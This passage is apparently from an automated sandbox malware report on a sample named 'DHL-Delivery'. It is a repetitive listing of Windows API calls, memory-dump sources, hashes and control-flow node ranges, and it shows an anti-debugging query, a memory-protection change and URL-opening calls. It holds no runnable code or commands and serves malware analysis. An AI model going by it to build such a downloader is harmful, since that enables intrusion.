                        • Instruction Fuzzy Hash: 0351F321748202DEFF255954C9A83EA3E56BB66321FE94E1BCC12D32A0D37289C5DE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: feeef3502ee701629437e0e26bbd93e3cd12cdbe9ef7b0bf10d9fba7cbb424c1
                        • Instruction ID: 252d935cd13819728b821fc79f924a6e2084d2dd0b817deddb12202fd07f95e0
                        • Opcode Fuzzy Hash: feeef3502ee701629437e0e26bbd93e3cd12cdbe9ef7b0bf10d9fba7cbb424c1
                        • Instruction Fuzzy Hash: 4751F321748202DEFF255954C9A83EA3E56BB66321FE94E1ACC12C72A0D37288C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 9e6734693a336e8a6cb0e30d52d99cf1bf2ac081b697f93934c5a98629f62a00
                        • Instruction ID: a63185457012b7a96f35eee9de83c60807f2bc8e03a28d6c394c363d18831a1e
                        • Opcode Fuzzy Hash: 9e6734693a336e8a6cb0e30d52d99cf1bf2ac081b697f93934c5a98629f62a00
                        • Instruction Fuzzy Hash: 8D511621748202DEFF354954C9A83E63E56BB66321FE94E5BCC13C7290D37289C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: d1ec5c44020d91248e58434730e86753849682f5f6f22a73086bbfb33477e30a
                        • Instruction ID: f3bdcee1950c53f5881050939efd2cd096eef39a3e47bbbd39eeb630cba23845
                        • Opcode Fuzzy Hash: d1ec5c44020d91248e58434730e86753849682f5f6f22a73086bbfb33477e30a
                        • Instruction Fuzzy Hash: 6A411521748202DDFF355954C9A83E63E56BB66321FE94E1BCC12C72A0D37288C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        APIs
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00569C94,00000040,00564080,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0056A423
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        Uniqueness

                        Uniqueness Score: 0.03%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: .$6*$h$m
                        • API String ID: 1029625771-1073823525
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 569afd-569ca0.
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadMemoryProtectVirtual
                        • String ID: "Bp0$"Bp0$GT`$nTAz
                        • API String ID: 3389902171-2115530794
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 565862-5658d6.
                        APIs
                        • InternetOpenA.WININET(005664E8,00000000,00000000,00000000,00000000,0056676B), ref: 005658A8
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 565870-5658d6.
                        APIs
                        • InternetOpenA.WININET(005664E8,00000000,00000000,00000000,00000000,0056676B), ref: 005658A8
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 565982-56598e.
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 5658b5-5658d6.
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 56399c-5639c5.
                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID: e
                        • API String ID: 1852365436-4024072794
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 565905-5659c4.
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Graph image not preserved in this capture; first node spans 563994-5639c5.
                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID: e
                        • API String ID: 1852365436-4024072794
                        • Opcode ID: cd657e3962b975226fec7cd8aadff2015373645a53e41b65ef865d3ae9638282
                        • Instruction ID: 29e8eba8e7f57086ea3a2debd0668c071bf3e94411856b521fd43fa399feb716
                        • Opcode Fuzzy Hash: cd657e3962b975226fec7cd8aadff2015373645a53e41b65ef865d3ae9638282
                        • Instruction Fuzzy Hash: 1131C2B1A84706AEEF30491889687D63B92BF573F0FB50201EC934B2D6F361C8C29612
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 614 56594b-5659c4 call 56ab16 call 56599d 621 565d1c-565d4b 614->621 622 5659ca-565a79 InternetOpenUrlA 614->622 622->621 628 565a7f-565ae9 622->628 631 565aec-565b7c call 565b10 628->631 637 565bae-565bfa call 56ab16 631->637 638 565b7e-565ba8 631->638 637->621 643 565c00-565c23 637->643 638->637 644 565c25-565c53 643->644 645 565c5d-565d13 call 56ab16 * 2 643->645 644->631
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 00fda33d2ccb91779967d904f6ef70d71b88e99f7889320af4e7302ad591ed2a
                        • Instruction ID: 8415d35932487add1b0afdf9650c4782065da68142e48efcb69af0e26c35983c
                        • Opcode Fuzzy Hash: 00fda33d2ccb91779967d904f6ef70d71b88e99f7889320af4e7302ad591ed2a
                        • Instruction Fuzzy Hash: 7531F73038474B9AEB304D688995BEE2BAABF41380F504625EC0797190F7728984D622
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 654 5659d0-565a79 InternetOpenUrlA 658 565a7f-565ae9 654->658 659 565d1c-565d4b 654->659 663 565aec-565b7c call 565b10 658->663 670 565bae-565bfa call 56ab16 663->670 671 565b7e-565ba8 663->671 670->659 676 565c00-565c23 670->676 671->670 677 565c25-565c53 676->677 678 565c5d-565d13 call 56ab16 * 2 676->678 677->663
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 03b0f451d0c43469a4393b9955e5846955aab3fe661fb3daf413a9e4e63f56cb
                        • Instruction ID: 518c649bb5f483e7ba0f2f2a82b5fbd962a213f80f8fbc2bc10dc828e3c6a1f2
                        • Opcode Fuzzy Hash: 03b0f451d0c43469a4393b9955e5846955aab3fe661fb3daf413a9e4e63f56cb
                        • Instruction Fuzzy Hash: E131EA703C474B9AE7308D68C9A57EF2BA7BF41780F504625EC0797190F3728945D622
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 687 565a12-565a79 InternetOpenUrlA 690 565a7f-565ae9 687->690 691 565d1c-565d4b 687->691 695 565aec-565b7c call 565b10 690->695 702 565bae-565bfa call 56ab16 695->702 703 565b7e-565ba8 695->703 702->691 708 565c00-565c23 702->708 703->702 709 565c25-565c53 708->709 710 565c5d-565d13 call 56ab16 * 2 708->710 709->695
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 42dd494e32318d1af3f60f1457ef673a35b64e7abcecf3df0bf6e5b1f02b6307
                        • Instruction ID: 5b38640c5e4e77b67f463f8f113bed7dee6947b057bedba0285ef4c54a7628f5
                        • Opcode Fuzzy Hash: 42dd494e32318d1af3f60f1457ef673a35b64e7abcecf3df0bf6e5b1f02b6307
                        • Instruction Fuzzy Hash: D621F8702C474BDBEB308D68CAA57EF2BAABF41380F548525EC0797550F732C945DA22
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 719 565a48-565a79 InternetOpenUrlA 720 565a7f-565ae9 719->720 721 565d1c-565d4b 719->721 725 565aec-565b7c call 565b10 720->725 732 565bae-565bfa call 56ab16 725->732 733 565b7e-565ba8 725->733 732->721 738 565c00-565c23 732->738 733->732 739 565c25-565c53 738->739 740 565c5d-565d13 call 56ab16 * 2 738->740 739->725
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 1a3cfd7fb883f5840f24e4ad6c3d243adbbdafe463af11c1fa88ed1a04fd4901
                        • Instruction ID: 61160a0c731772857abf24dd6ef1bf18e7e2df2525521534b71c40e9b68a4226
                        • Opcode Fuzzy Hash: 1a3cfd7fb883f5840f24e4ad6c3d243adbbdafe463af11c1fa88ed1a04fd4901
                        • Instruction Fuzzy Hash: 98213E7028074BDBEB308E24CAA47EF2BAABF51380F608625DD0697551F732C944DB11
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 45fca3a58a572a0ab86014a858dbaeaa3d0d50a2af4ccb83505b4fee35663f2d
                        • Instruction ID: d3f3599a497828e622f318e3a91e8c9516d82e502e0b9d2d000bb6069091d459
                        • Opcode Fuzzy Hash: 45fca3a58a572a0ab86014a858dbaeaa3d0d50a2af4ccb83505b4fee35663f2d
                        • Instruction Fuzzy Hash: 1841F698B4571BA5DF34307805B93FF099BAF62BE0FF44B36DC8393185AA6644C59102
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f88ee85f83b795f24fdb97f415a275924762e6dbff2cf7a72617f166c2a30f3e
                        • Instruction ID: 46324f18dd8d31e58a3fc8027f81a8890f5d8e62fe9e497340f4503ff4a0dec9
                        • Opcode Fuzzy Hash: f88ee85f83b795f24fdb97f415a275924762e6dbff2cf7a72617f166c2a30f3e
                        • Instruction Fuzzy Hash: 42416DA0B447039DEF34157889B87FB1A96BF527A0FA44B29DC4397286FB1589C48742
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadTerminateThread
                        • String ID:
                        • API String ID: 3464572979-0
                        • Opcode ID: 149e187a5145e804093eb4fb07afe89b61ca8692c9e23f3a5133b3fcf3e1b1d0
                        • Instruction ID: c19d4426565922bf8ff657a163b29784cf0f89605e199aed6853f4722611b1d6
                        • Opcode Fuzzy Hash: 149e187a5145e804093eb4fb07afe89b61ca8692c9e23f3a5133b3fcf3e1b1d0
                        • Instruction Fuzzy Hash: 9431D1B1995702EEEB21555889687D63B92BF173F0FA40201EC924B2D6F321C883D512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadTerminateThread
                        • String ID:
                        • API String ID: 3464572979-0
                        • Opcode ID: 1d64b7d44dfa9decaf86c41fb4d1662117de6cef1030f10140a3907e55a65710
                        • Instruction ID: d2ce84aa5d15c793d43192ff8a2238da93d775b8670900db772c18812dee5488
                        • Opcode Fuzzy Hash: 1d64b7d44dfa9decaf86c41fb4d1662117de6cef1030f10140a3907e55a65710
                        • Instruction Fuzzy Hash: 55319071991706AEEF3049A449687D63B51BF273F0FA90511EC92472D5F710C8C29511
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 6764a163ee94a077ecba292d65fe15efc8bfd71a0f6e322f3dd1fe28b28ef452
                        • Instruction ID: 878dc04d145b05ae84164b105fb20a58c6af6a61d4c14fd394cd8b8710dac43e
                        • Opcode Fuzzy Hash: 6764a163ee94a077ecba292d65fe15efc8bfd71a0f6e322f3dd1fe28b28ef452
                        • Instruction Fuzzy Hash: CA113895A44307B8DF3425B41AB97FF0D47AF52F74FB00B2AEC42D3146EE5588C84612
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 754b74b59c0beadf1b5b5e54c81342093bdab90e62a06f8407db8328a425acd7
                        • Instruction ID: c1d2322e6ec264f27c17ff8fcf335767c45eba15774cfe144dfa923d01fc2236
                        • Opcode Fuzzy Hash: 754b74b59c0beadf1b5b5e54c81342093bdab90e62a06f8407db8328a425acd7
                        • Instruction Fuzzy Hash: 6C1184A9A85307A8DF30357545B93FF1E43BF51BB4FA05B26EC42D3102EE6685C94213
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 67dc515dba15488b25c5d5e3f5b6c1342b9d1606cde30ec88de46233dbf80779
                        • Instruction ID: a5e400c1c78b3017f7be881a05ee2e4419cd062a284e452f99d44f3abe5889eb
                        • Opcode Fuzzy Hash: 67dc515dba15488b25c5d5e3f5b6c1342b9d1606cde30ec88de46233dbf80779
                        • Instruction Fuzzy Hash: 58110898A45307B8DF34217559B97FF0A47AF52BB4FA04B2AEC82D3106EE6588C54612
                        Uniqueness

